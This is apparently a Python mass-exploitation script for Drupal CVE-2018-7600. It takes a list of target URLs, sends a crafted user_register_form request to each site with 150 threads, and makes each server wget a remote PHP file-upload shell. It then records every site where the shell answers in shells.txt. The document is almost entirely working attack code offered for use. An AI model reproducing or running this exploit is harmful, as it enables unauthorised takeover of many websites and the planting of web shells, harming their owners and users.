drupal rce

1. #!/usr/bin/env
2. import sys
3. import requests
4. from multiprocessing.dummy import Pool
5. import time
6. import random
7.  
8.  
9.  
10.  
11.  
12. try:
13. target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]
14. except IndexError:
15. exit('Usage: m3.py list.txt')
16. def progressbar(it, prefix = "", size = 1000):
17. count = len(it)
18. def _show(_i):
19. x = int(size*_i/count)
20. sys.stdout.write("%s[%s%s] %i/%i\r" % (prefix, "#"*x, "_"*(size-x), _i, count))
21. sys.stdout.flush()
22. _show(0)
23. for i, item in enumerate(it):
24. yield item
25. _show(i+1)
26. sys.stdout.write("\n")
27. sys.stdout.flush()
28. toolbar_width = 30
29.  
30. sys.stdout.write(":%s:" % (" " * toolbar_width))
31. sys.stdout.flush()
32. sys.stdout.write("\b" * (toolbar_width+1))
33.  
34. for i in xrange(toolbar_width):
35. time.sleep(0.01)
36.  
37. sys.stdout.write("*")
38. sys.stdout.flush()
39.  
40. sys.stdout.write("\n")
41. def print_logo():
42. clear = "\x1b[0m"
43. colors = [31, 32, 33, 34, 35, 36]
44.  
45. logo = """
46. __^__ __^__
47. ( ___ )---------------------------( ___ )
48. | / | Durpal CVE 2018 7600 RCE | |
49. |___| |___|
50. (_____)---------------------------(_____)
51.  
52. """
53. for line in logo.split("\n"):
54. sys.stdout.write("\x1b[1;%dm%s%s\n" % (random.choice(colors), line, clear))
55. time.sleep(0.05)
56. print_logo()
57.  
58. payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php'}
59. headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'}
60.  
61. def run(u):
62. try:
63. url = u + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
64. r = requests.post(url, data=payload, verify=False, headers=headers)
65. if 'Select Your File :' in requests.get(u+'/payload.php', verify=False, headers=headers).text:
66. print (u, '==> RCE')
67. with open('shells.txt', mode='a') as d:
68. d.write(u + '/payload.php\n')
69. else:
70. print(u, "==> Not Vuln")
71. except:
72. pass
73.  
74. mp = Pool(150)
75. mp.map(run, target)
76. mp.close()
77. mp.join()